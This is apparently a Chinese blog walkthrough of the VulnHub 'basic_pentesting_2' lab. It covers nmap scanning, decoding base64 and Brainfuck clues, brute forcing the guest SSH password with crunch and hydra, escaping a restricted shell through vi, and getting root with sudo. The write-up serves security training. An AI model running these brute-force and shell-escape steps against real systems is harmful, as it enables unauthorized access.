首页 > 其他分享 >basic_pentesting_2靶场实战【超详细】

basic_pentesting_2靶场实战【超详细】

时间:2024-08-06 19:27:39浏览次数:22  
标签:bin 命令 guest 密码 192.168 pentesting ssh basic 靶场

下载链接:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz

一、靶场配置

网卡配置为nat

二、主机探测与端口扫描

nmap 192.168.121.0/24

 开放了22、80、31337端口

nmap 192.168.121.188 -p- -A -sV -Pn

 访问80web服务

 提示跟随白色兔子

f12查看源码,发现一个图片地址

 图片名字指向了31337端口,我们打开它是白色兔子

 访问31337端口看看

 F12查看源码

发现一串base64加密的字符

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

对其进行解码,解出如下内容

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

是把一串内容写入到了 Cypher.matrix 文件中

访问该文件

 发现其被下载,打开看看

 可能是什么加密方式,搜了一下,是 Brainfuck 加密

使用工具对其进行解密

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

说是能以 guest 用户进行登录 ,密码为 k1ll0rXX ,但是最后两位忘了,所以用XX代替,需要爆破一下

三、get shell

根据密码样式,最后两位大概率 小写字母+数字,使用kali中crunch工具生成字典

 命令解释

crunch 8 8 -t k1ll0r%@ -o 1.txt
#参数
8 8:密码最小长度和最大长度
-t:使用特殊符号
%:0-9数字
@:小写字母
-o:输入到指定文件

用 hydra 工具进行密码爆破

hydra -l guest -P passwd.txt ssh://192.168.121.188

爆破出密码为:

k1ll0r7n

尝试ssh连接

ssh [email protected]

 连接成功

四、提权

sudo -l

查看具有sudo权限的命令程序

无法使用

很多命令也无法使用,执行export看看

 发现shell被限制

经过不断的尝试,vi命令可以使用

vi

按shift+:

!/bin/bash

 发现还是无法执行一些命令,执行以下命令,配置环境变量绕过

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

 

 添加完环境变量之后,直接sudo su,提权成功

标签:bin,命令,guest,密码,192.168,pentesting,ssh,basic,靶场
From: https://blog.csdn.net/weixin_68615160/article/details/140963385

相关文章

  • CVE-2023-7130漏洞靶场复现
    CollegeNotesGallery2.0允许通过“/notes/login.php”中的参数‘user’进行SQL注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.抓登录包放sqlmap爆破直接--dump一把梭哈......
  • CVE-2023-0562银行储物柜管理系统登录页面sql注入漏洞靶场复现
    在PHPGurukul银行储物柜管理系统1.0中发现了一个漏洞。它被评定为临界状态。受此问题影响的是组件登录的文件index.php的一些未知功能。对参数username的操作会导致sql注入。攻击可能是远程发起的。该漏洞已被公开,并可能被利用。此漏洞的标识符是VDB-219716。抓登录包放salmap......
  • cockpit <=2.4.1 后台任意文件上传漏洞靶场复现(CVE-2023-1313)
    cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装主页界面使用admin/admin登录不了根据提示访问/install后自动创建admin/admin,再次登录可以找到一个上传点,上传phpinfo并burp抓包具体路径可以在上传后有个下载按钮,会看到完整的访问......
  • basic_pentesting_1靶场实战[超详细]
    下载地址:https://download.vulnhub.com/depth/DepthB2R.ova一、靶场配置网卡模式设置为nat二、主机探测与端口扫描nmap192.168.121.0/24 ip地址为192.168.121.186,开启了21、22、80端口扫描一下端口信息nmap192.168.121.186-sV-A-p- 访问一下80web服务看看......
  • DepthB2R靶场实战【超详细】
    下载地址:https://download.vulnhub.com/depth/DepthB2R.ova一、主机探测与端口扫描nmap192.168.121.0/24 发现开启了8080端口我们对该端口进行扫描nmap192.168.121.187-p--A-Pn-sV 访问其8080web服务二、getshell目录扫描dirsearch-uhttp://192.168.121......
  • SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130)靶场复现
    SourceCodesterPurchaseOrderManagementSystemv1.0是一个实用的工具,适合希望优化采购流程的企业和组织靶场界面直接放sqlmap跑爆数据库爆数据表爆字段爆内容-用户名爆内容-密码sqlmap的md5碰撞sqlmap所有命令点击查看代码爆数据库pythonsqlmap.py-u......
  • Jorani远程命令执行漏洞 CVE-2023-26469靶场复现
    靶场界面点击查看exp↓↓↓"""vulnerabilitycoveredbyCVE-2023-26469"""importreadlineimportrequestsimportdatetimeimportsysimportreimportbase64importrandomimportstringrequests.packages.urllib3.disable_warnings(requ......
  • javabasic笔记----分支语句
    分支语句--ifif单分支语句语法:        //....前置代码        if(codition){           //code1        }        //....后续代码如果codition返回true, 就执行code1,继续执行后续代码如果codition返回false,就跳过......
  • 网络靶场搭建教程
    例:搭建网络靶场是一个复杂的过程,涉及到多个步骤和工具。以下提供的教程是主要概述:1. 准备工作:首先需要选择一个操作系统,例如Ubuntu20.464位,并确保系统环境满足搭建靶场的要求。如果没有Docker基础,可以先通过相关视频教程进行学习。2. 安装Docker:使用官方安装脚本自动安......
  • 【Vulnhub系列】Vulnhub Noob 靶场渗透(原创)
    【Vulnhub系列靶场】VulnhubNoob靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、主机发现二、端口扫描有一个go.php的form表单接收文件这里识别21端口存在未授权,55077是ssh的服务端口三、web渗透1、web信息收......